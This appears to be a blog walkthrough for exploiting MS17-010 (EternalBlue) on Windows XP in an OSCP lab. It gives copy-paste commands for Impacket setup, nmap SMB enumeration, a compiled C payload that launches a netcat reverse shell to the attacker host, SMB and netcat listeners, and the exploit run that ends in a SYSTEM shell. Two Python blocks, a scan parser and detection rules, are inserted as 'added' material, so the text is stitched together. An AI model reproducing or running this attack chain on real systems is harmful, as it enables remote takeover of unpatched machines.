Exploit Eternal Blue (MS17–010) for Windows XP with custom payload

Nol White Hat
Published in InfoSec Write-ups
6 min read · Jun 18, 2022

Summary

This article shows you how to exploit the MS17–010 vulnerability on Windows XP.

Disclaimer

This article is for informational and educational purposes only, and for those who’re willing and curious to know and learn about Security and Penetration Testing. The content may not be used for illegal purposes. If you’re ready to learn something new for the good, then read on.

Details

Why this post?

During my OSCP training I had a lot of trouble rooting XP target ‘Xlicx in Wonderland’. After many hours of troubleshooting, it finally worked. I would like to save others from wasting precious lab time.

This walkthrough has been prepared so that it should always work on any Windows XP or Windows 2000 ('JD') system that is vulnerable to MS17–010.

Our final payload will be an executable file that:
- will set up a netcat reverse shell (port 8080)

The PoC consists of two machines: the victim (Windows XP) and an attacker machine (Kali Linux 2022.1).

victim:
- Windows XP Professional SP3
- IP address: 192.168.62.149
- Security: Default Windows firewall = ON
- File and Print sharing = enabled

Attacker (for reverse shell):
- Kali Linux
- IP-Address: 192.168.62.161

In this guide I use the terms 'kali' and 'LHOST' interchangeably (we will use the variables 'kali' or 'LHOST'). You can change this address to your needs and copy + paste the code into a Bash terminal.

Prerequisites

We start by installing the prerequisites that must be in place before we can run the exploit.

1. Performed on 192.168.62.161 (attacker machine, Kali Linux)

Download and install the latest version of Impacket. Set the directory world-writable (yes, this is necessary).

cd /opt
sudo git clone https://github.com/SecureAuthCorp/impacket.git
sudo chmod 777 /opt/impacket -R

2. Performed on 192.168.62.161 (attacker machine, Kali Linux)

Install the virtualenv tool.

sudo apt install virtualenv

3. Performed on 192.168.62.161 (attacker machine, Kali Linux)

Start a python2 virtual environment inside the Impacket directory.

cd /opt/impacket
sudo virtualenv impacket-venv -p $(which python2)
source impacket-venv/bin/activate

Note: if you get a "Python file not found" error, just execute the command once more and it will work.

Result: you should have a prompt changed to ‘(impacket-venv)’.

4. Performed on 192.168.62.161 (attacker machine, Kali Linux)

Inside the python2 virtual environment ‘(impacket-venv)’, install pip for python2.

cd /tmp
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py -O /tmp/get-pip.py --no-check-certificate
sudo python2 get-pip.py

5. Performed on 192.168.62.161 (attacker machine, Kali Linux)

Inside the python2 virtual environment ‘(impacket-venv)’, install Impacket requirements.

cd /opt/impacket
pip install -r requirements.txt
pip install .

Enumeration

Now that you have updated your system with the requirements to run the exploit, you can start scanning the target machine (Windows XP in our case).

6. Performed on 192.168.62.161 (attacker machine, Kali Linux)

Use nmap to scan the target machine for SMB vulnerabilities.

cd /usr/share/nmap/scripts
target=192.168.62.149
p=445
# smbpass is left empty (anonymous), unsafe=1 lets the smb-vuln-* checks run their intrusive tests
scriptargs='smbpass=,smbdomain=mydomain.com,unsafe=1'
# Run every smb-* NSE script except the brute-force and flood ones, keeping only the "|" result lines
for script in $(ls smb* | grep -v -e brute -e flood); do
    echo "=== $script ==="
    sudo nmap "$target" --script="$script" --script-args="$scriptargs" -p "$p" | grep "|"
done

Our target machine is vulnerable to MS17–010!
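Before the box is ever touched, the scan output above is also the input for a remediation ticket. As an added example (not part of the original post), a small Python parser for what the loop prints: it groups the "|"-prefixed NSE lines under each "=== script ===" header, pulls out the vulnerability title, State and CVE IDs, and lists which scripts reported the host as vulnerable. The sample output is constructed, modelled on the vulns library format the smb-vuln-* scripts use.

```python
import re

# Constructed sample of the loop's output: an "=== script ===" header per NSE
# script followed by that script's "|"-prefixed lines (vulns library format).
SAMPLE_SCAN_OUTPUT = """\
=== smb-os-discovery.nse ===
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|_  Computer name: xp-victim
=== smb-vuln-ms08-067.nse ===
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|_    Risk factor: HIGH
=== smb-vuln-ms17-010.nse ===
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|_    Risk factor: HIGH
"""

HEADER_RE = re.compile(r"^=== (\S+) ===$")
STATE_RE = re.compile(r"^\|[_ ]\s*State:\s*(.+?)\s*$")
IDS_RE = re.compile(r"^\|[_ ]\s*IDs:\s*(.+?)\s*$")

def parse_smb_vuln_scan(text):
    """Return {script: {"title", "state", "ids"}} for every script that printed a State line.
    The title is the "|" line just before "State:", which is where the vulns library puts it."""
    findings, script, prev = {}, None, None
    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            script, prev = m.group(1), None
            continue
        if script is None or not line.startswith("|"):
            continue
        body = line.lstrip("|_ ").rstrip()
        m = STATE_RE.match(line)
        if m:
            findings[script] = {"title": prev, "state": m.group(1), "ids": []}
        elif script in findings and IDS_RE.match(line):
            # "IDs:  CVE:CVE-2017-0143  OSVDB:12345" -> ["CVE-2017-0143", "12345"]
            tokens = IDS_RE.match(line).group(1).split()
            findings[script]["ids"] = [t.split(":", 1)[1] for t in tokens if ":" in t]
        prev = body
    return findings

def needs_patching(findings):
    """Scripts whose State means the host must be remediated; NOT VULNERABLE and UNKNOWN are skipped."""
    return sorted(s for s, f in findings.items()
                  if f["state"].startswith(("VULNERABLE", "LIKELY VULNERABLE")))
```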

Payload creation (for Windows XP)

Our final payload will be an executable file that:

- will set up a netcat reverse shell (port 8080)

Everything we need to run the exploit is copied to the /tmp directory on Kali. This directory will be served to the target by the Impacket SMB server we start in the listener section.

7. Performed on 192.168.62.161 (attacker machine, Kali Linux)

Copy and paste the Bash snippet below to create the C source file /tmp/testexe.c. Adjust the value of 'kali=' to your Kali IP address.

kali=192.168.62.161
portnc2=8080
cd /tmp
# Unquoted heredoc: $kali and $portnc2 expand, and each \\ becomes a single backslash in the file,
# so the C string ends up as "START /B \\\\<kali>\\smb\\nc.exe <kali> <port> -e cmd".
cat > testexe.c <<EOF
#include <stdlib.h>
int main ()
{
    int i;
    i = system("START /B \\\\\\\\$kali\\\\smb\\\\nc.exe $kali $portnc2 -e cmd");
    return 0;
}
EOF

Result is source file /tmp/testexe.c

8. Performed on 192.168.62.161 (attacker machine, Kali Linux)

Compile /tmp/testexe.c to /tmp/ruby-xp.exe (the name ruby-xp.exe is arbitrary; it can be something else if you want).

/usr/bin/i686-w64-mingw32-gcc /tmp/testexe.c -o /tmp/ruby-xp.exe
/usr/bin/i686-w64-mingw32-strip /tmp/ruby-xp.exe

You have now created a Windows payload file. The next steps are to prepare the related files that will be called by the payload file (ruby-xp.exe).

Netcat reverse shell payload

Our final payload file (ruby-xp.exe) will set up a netcat reverse shell on TCP port 8080. This is done by the following line of code:

i = system("START /B \\\\192.168.62.161\\smb\\nc.exe 192.168.62.161 8080 -e cmd");
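The same line seen from the victim's side: system() spawns cmd.exe, which starts nc.exe straight off the attacker's SMB share and hands it a cmd shell, all as SYSTEM. As an added example (not part of the original post), three independent detection rules over constructed EDR-style process-creation records; the field names are modelled on Sysmon/EDR ProcessCreate events and the file paths are assumptions.

```python
import re
import ntpath

# Constructed process-creation records (field names modelled on EDR/Sysmon ProcessCreate
# events). The first three are the chain the payload above produces on the victim:
# ruby-xp.exe -> cmd.exe (from system()) -> nc.exe loaded straight off the attacker's share.
EVENTS = [
    {"Image": r"C:\WINDOWS\system32\ruby-xp.exe", "ParentImage": r"C:\WINDOWS\system32\services.exe",
     "CommandLine": r"C:\WINDOWS\system32\ruby-xp.exe"},
    {"Image": r"C:\WINDOWS\system32\cmd.exe", "ParentImage": r"C:\WINDOWS\system32\ruby-xp.exe",
     "CommandLine": r"cmd.exe /c START /B \\192.168.62.161\smb\nc.exe 192.168.62.161 8080 -e cmd"},
    {"Image": r"\\192.168.62.161\smb\nc.exe", "ParentImage": r"C:\WINDOWS\system32\cmd.exe",
     "CommandLine": r"\\192.168.62.161\smb\nc.exe 192.168.62.161 8080 -e cmd"},
    # Benign noise: a directory listing on a file share and a netcat port check without -e.
    {"Image": r"C:\WINDOWS\system32\cmd.exe", "ParentImage": r"C:\WINDOWS\explorer.exe",
     "CommandLine": r"cmd.exe /c dir \\fileserver\public"},
    {"Image": r"C:\tools\nc.exe", "ParentImage": r"C:\WINDOWS\system32\cmd.exe",
     "CommandLine": r"nc.exe -zv fileserver 445"},
]

UNC_PATH_RE = re.compile(r"\\\\[\w.\-]+\\[^\s\\]+\\")  # \\host\share\... (a file under a share)
NETCAT_SHELL_RE = re.compile(r"\b(?:nc|nc64|ncat)\.exe\b.*\s-e\s+cmd(?:\.exe)?\b", re.I)

def detect(events):
    """Return (rule, Image) alerts. The rules are independent: if nc.exe never starts
    (e.g. outbound 445 is blocked), the cmd.exe stage with START plus a UNC path still fires."""
    alerts = []
    for ev in events:
        image, cmdline = ev["Image"], ev["CommandLine"]
        if image.startswith("\\\\"):                 # executable loaded from a network share
            alerts.append(("image_from_network_share", image))
        if NETCAT_SHELL_RE.search(cmdline):          # netcat handing a shell to cmd
            alerts.append(("netcat_bound_to_cmd", image))
        if ntpath.basename(image).lower() == "cmd.exe" and UNC_PATH_RE.search(cmdline) \
                and re.search(r"\bstart\b", cmdline, re.I):
            alerts.append(("cmd_start_unc_binary", image))
    return alerts
```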

9. Performed on 192.168.62.161 (attacker machine, Kali Linux)

Copy netcat to staging directory (/tmp)

cp /usr/share/windows-resources/binaries/nc.exe /tmp

Set up the required listeners

Next, open a new instance of Bash Terminal. Open a new tab for each "listener". You will need 5 open tabs for all required listeners.

10. Performed on 192.168.62.161 (attacker machine, Kali Linux)

Set up an SMB server (the stager) that serves /tmp, so the target can fetch the essential files from it.

sudo impacket-smbserver -ip 192.168.62.161 -port 445 smb /tmp/

11. Performed on 192.168.62.161 (attacker machine, Kali Linux)

Start a netcat listener on port 8080 to catch the reverse shell connection.

rlwrap nc -nlvp 8080

Prepare MS17–010 exploit

We have now made our preparations for the payload. The next section is about running the actual exploit. Open a new Bash Terminal instance to execute the commands.

12. Performed on 192.168.62.161 (attacker machine, Kali Linux)

Download the exploit.

cd /tmp
git clone https://github.com/helviojunior/MS17-010.git

13. Performed on 192.168.62.161 (attacker machine, Kali Linux)

Start the Python2 environment inside the Impacket folder (the same environment as in step 3, re-activated in the new terminal).

cd /opt/impacket
sudo virtualenv impacket-venv -p $(which python2)
source impacket-venv/bin/activate

14. Performed on 192.168.62.161 (attacker machine, Kali Linux)

Inside the Python2 environment ‘(impacket-venv)’, run the exploit against our target (192.168.62.149) with our payload file (/tmp/ruby-xp.exe).

python2 /tmp/MS17-010/send_and_execute.py 192.168.62.149 /tmp/ruby-xp.exe

Ignore the error ERROR_SERVICE_TIMEOUT.

Check out our results:

SMB listener

An SMB connection is established.

Netcat listener

We have a SYSTEM shell!

In my next blog, I will focus more on exploiting Active Directory. I will show you how to use PowerShell Empire as alternative for mimikatz.
